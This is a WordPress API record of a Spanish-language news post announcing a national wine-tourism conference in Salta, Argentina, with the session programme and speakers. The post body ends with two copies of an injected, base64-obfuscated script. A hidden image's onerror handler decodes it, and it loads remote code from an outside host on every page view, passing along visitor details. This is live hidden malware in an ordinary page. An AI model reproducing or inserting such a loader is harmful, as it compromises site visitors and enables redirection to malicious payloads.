{"id":1812,"date":"2022-11-22T11:06:20","date_gmt":"2022-11-22T14:06:20","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1812"},"modified":"2025-08-14T00:29:55","modified_gmt":"2025-08-14T03:29:55","slug":"destacados-expositores-hablaran-esta-semana-sobre-tendencias-del-enoturismo-nacional-e-internacional","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1812","title":{"rendered":"Destacados expositores hablar\u00e1n esta semana sobre tendencias del enoturismo nacional e internacional"},"content":{"rendered":"\n<h4 class=\"has-cyan-bluish-gray-color has-text-color has-background wp-block-heading\" style=\"background-color:#5d0219\"><em>Ser\u00e1 en el marco de las II Jornadas Nacionales de Turismo del Vino del 24 y 25 de noviembre. El martes 22 finalizan las inscripciones.<\/em><\/h4>\n\n\n\n<p>El Ministerio de Turismo y Deportes de Salta, su hom\u00f3nimo de la Naci\u00f3n y la Corporaci\u00f3n Vitivin\u00edcola Argentina (Coviar) invitan a participar de las II Jornadas Nacionales de Turismo del Vino cuyas inscripciones para la primera jornada contin\u00faan abiertas en el siguiente enlace:&nbsp;&nbsp;&nbsp;https:\/\/forms.gle\/FDsyBkZRG1ZQsFDv6&nbsp;&nbsp;<\/p>\n\n\n\n<p>El 24 de noviembre el Centro de Convenciones Salta desde las 8.30 recibir\u00e1 a destacados expositores que compartir\u00e1n experiencias, conocimientos y contar\u00e1n el desarrollo del enoturismo en el pa\u00eds, pero tambi\u00e9n habr\u00e1 espacio para acceder a tendencias internacionales de la actividad.<\/p>\n\n\n\n<p>Las jornadas est\u00e1n destinadas a profesionales de la actividad vitivin\u00edcola, a emprendedores tur\u00edsticos, estudiantes y a todo amante del turismo y del vino, la bebida nacional.<\/p>\n\n\n\n<p><strong>Programa<\/strong><\/p>\n\n\n\n<p>08:00 \u2013 09:00 &#8211; Acreditaciones<\/p>\n\n\n\n<p>09:00 \u2013 09:15 &#8211; Iniciativas y Acciones con Visi\u00f3n de Futuro &#8211; Recorrido 2020-2022 a cargo de Mat\u00edas Teves y Juan Montero, referentes T\u00e9cnicos del Ministerio de Turismo y Deportes de la Naci\u00f3n.<\/p>\n\n\n\n<p><strong>Turismo Del Vino, Identidad, Valor y Territorio<\/strong><\/p>\n\n\n\n<p>09:15 \u2013 10:30 Diversidad e Identidad de Destinos Enotur\u00edsticos.&nbsp; Su ADN y los elementos diferenciales en la propuesta de valor de los enodestinos. Javier Espina, Director del Consejo Federal de Turismo. Ex Ministro de Turismo de la provincia de Mendoza.<\/p>\n\n\n\n<p>El Vino y la Gastronom\u00eda en el Territorio. El terru\u00f1o como ingrediente fundamental en las experiencias enotur\u00edsticas. Jos\u00e9 Bahamonde, emprendedor y comunicador del vino y la gastronom\u00eda argentina.<\/p>\n\n\n\n<p>TURISMO Y PROMOCI\u00d3N DEL VINO EN LOS MERCADOS INTERNACIONALES. Estrategias para promocionar el turismo del vino a trav\u00e9s de una botella. Juan Pablo Sandoni, Responsable RRPP de Wines of Argentina (WOFA).<\/p>\n\n\n\n<p>CREACI\u00d3N DE EXPERIENCIAS ENOTUR\u00cdSTICAS CON VALOR E IDENTIDAD. El Caso Familia Zuccardi. Mar\u00eda Eugenia Valle, Jefa de turismo en Bodega Santa Julia de Familia Zuccardi.<\/p>\n\n\n\n<p><strong>Valores para un Turismo Sustentable<\/strong><\/p>\n\n\n\n<p>11:00 \u2013 12:00 Mujeres en la tierra del vino. La visi\u00f3n de la mujer y su rol en el desarrollo del turismo del vino. Claudia Alemandi, Asociaci\u00f3n mujeres del vino de Salta.<\/p>\n\n\n\n<p>El paisaje y la bodega como escenarios del turismo del vino. Integraci\u00f3n del paisaje y la arquitectura en la experiencia tur\u00edstica. Arq. Eliana B\u00f3rmida, co-titular del estudio B\u00f3rmida y Yanz\u00f3n especializado en bodegas vitivin\u00edcolas.<\/p>\n\n\n\n<p>11:00 \u2013 12:00&nbsp; La sustentabilidad apicada a la experiencia enotur\u00edstica. El turismo del vino, su desarrollo en compromiso con el medio ambiente y la comunidad local. Caso Hotel &amp; Bodega Araoz de Lamadrid. Gregorio Araoz Lamadrid, productor de vinos.<\/p>\n\n\n\n<p>Personas, formaci\u00f3n y tendencias de un mundo diferente. Pensando el futuro del enoturismo: una mirada sobre la competitividad, la innovaci\u00f3n, el conocimiento y el territorio. Cecilia Camou, Consultora en Turismo Sostenible.<\/p>\n\n\n\n<p>12:00 Acto de apertura con autoridades nacionales y provinciales, del sector p\u00fablico y privado.<\/p>\n\n\n\n<p><strong>Gesti\u00f3n en tiempo real<\/strong><\/p>\n\n\n\n<p>A las 14, Observatorio Econ\u00f3mico del Turismo del Vino:&nbsp; Presentaci\u00f3n de resultados. Pablo Singerman, Director del OETV.<\/p>\n\n\n\n<p>Los Observatorios de Turismo, una mirada Introspectiva: An\u00e1lisis y perspectivas de los observatorios, como herramientas para la toma de decisiones en tiempo real. Importancia del cluster en la provisi\u00f3n de datos. Cecilia Gatta, Especialista en Econom\u00eda Tur\u00edstica. Rodrigo Lemos, Coordinador Turismo del Vino de la Corporaci\u00f3n Vitivin\u00edcola Argentina (COVIAR)<\/p>\n\n\n\n<p>Taller: Datos y m\u00e9tricas para la toma de decisiones. Revolucionar la toma de datos y la Big Data del Enoturismo. Equipo Distalleres: Romanella Paggi, Diego Conca, Julieta Rosi, Gustavo, Capece y Noelia Castro.<\/p>\n\n\n\n<p><strong>Hacia un nuevo horizonte Jornadas Internacionales De Turismo Del Vino<\/strong><\/p>\n\n\n\n<p>16:30 Salta Nuestro Norte: logros, resultados, caminos a seguir en el turismo del vino. Nadia Loza, Secretaria de Turismo de la provincia de Salta. Marcos Patr\u00f3n, Coordinador General de Bodegas de Salta.<\/p>\n\n\n\n<p>17:00 \u2013 17:20 Inprotur- Avance y primeros resultados del plan de Marketing Internacional. Plan de acci\u00f3n para el 2023. \u201cC\u00f3mo vamos a vender el turismo del vino en el mundo y por qu\u00e9 definimos ese plan de acci\u00f3n\u201d. Pablo Sismanian, Director de Productos Tur\u00edsticos. Oscar Suarez, Coordinador de Promoci\u00f3n Tur\u00edstica Internacional. Moderaci\u00f3n: Romina Sorrentino, Directora de Promoci\u00f3n Estrat\u00e9gica. Ministerio de Turismo&nbsp; y Deportes de la Naci\u00f3n.<\/p>\n\n\n\n<p>17:20 Marca Pa\u00eds. Avance y futuras acciones \u2013 Submarca, Argentina Tierra de Vinos. Proyecto de actuaci\u00f3n 2023.Nadia Zanardi, directora nacional de Marca Pa\u00eds.<\/p>\n\n\n\n<p><strong>Panel Internacional<\/strong><\/p>\n\n\n\n<p>17:40 La comercializaci\u00f3n del turismo del vino en mercados internacionales. Alegr\u00edas y frustraciones en la comercializaci\u00f3n de experiencias enotur\u00edsticas. Experiencia Bilbao &#8211; Rioja. Duraci\u00f3n 40 minutos. Carmen Romo, Directora RomoTour, primer DMC del pa\u00eds Vasco. Yanina Mart\u00ednez, Secretaria de Promoci\u00f3n Tur\u00edstica de la Naci\u00f3n; Mario Pe\u00f1a, ministro de Turismo y Deportes de Salta.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img fetchpriority=\"high\" decoding=\"async\" width=\"480\" height=\"600\" data-id=\"1813\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/1896-destacados-expositores-hablaran-esta-semana-sobre-tendencias-del-enoturismo-nacional-e-internacional.png\" alt=\"\" class=\"wp-image-1813\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/1896-destacados-expositores-hablaran-esta-semana-sobre-tendencias-del-enoturismo-nacional-e-internacional.png 480w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/1896-destacados-expositores-hablaran-esta-semana-sobre-tendencias-del-enoturismo-nacional-e-internacional-240x300.png 240w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/1896-destacados-expositores-hablaran-esta-semana-sobre-tendencias-del-enoturismo-nacional-e-internacional-336x420.png 336w\" sizes=\"(max-width: 480px) 100vw, 480px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"480\" height=\"600\" data-id=\"1814\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/1897-destacados-expositores-hablaran-esta-semana-sobre-tendencias-del-enoturismo-nacional-e-internacional.png\" alt=\"\" class=\"wp-image-1814\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/1897-destacados-expositores-hablaran-esta-semana-sobre-tendencias-del-enoturismo-nacional-e-internacional.png 480w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/1897-destacados-expositores-hablaran-esta-semana-sobre-tendencias-del-enoturismo-nacional-e-internacional-240x300.png 240w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/1897-destacados-expositores-hablaran-esta-semana-sobre-tendencias-del-enoturismo-nacional-e-internacional-336x420.png 336w\" sizes=\"(max-width: 480px) 100vw, 480px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"480\" height=\"600\" data-id=\"1815\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/1898-destacados-expositores-hablaran-esta-semana-sobre-tendencias-del-enoturismo-nacional-e-internacional.png\" alt=\"\" class=\"wp-image-1815\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/1898-destacados-expositores-hablaran-esta-semana-sobre-tendencias-del-enoturismo-nacional-e-internacional.png 480w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/1898-destacados-expositores-hablaran-esta-semana-sobre-tendencias-del-enoturismo-nacional-e-internacional-240x300.png 240w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/1898-destacados-expositores-hablaran-esta-semana-sobre-tendencias-del-enoturismo-nacional-e-internacional-336x420.png 336w\" sizes=\"(max-width: 480px) 100vw, 480px\" \/><\/figure>\n<\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Ser\u00e1 en el marco de las II Jornadas Nacionales de Turismo del Vino del 24 y 25 de noviembre. El martes 22 finalizan las inscripciones. El Ministerio de Turismo y Deportes de Salta, su hom\u00f3nimo de la Naci\u00f3n y la Corporaci\u00f3n Vitivin\u00edcola Argentina (Coviar) invitan a participar de las II Jornadas Nacionales de Turismo del [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1816,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14,24,18],"tags":[],"class_list":{"0":"post-1812","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios","8":"category-bodegas","9":"category-rutas-y-caminos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1812"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1812"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1812\/revisions"}],"predecessor-version":[{"id":7271,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1812\/revisions\/7271"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1816"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1812"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1812"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1812"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}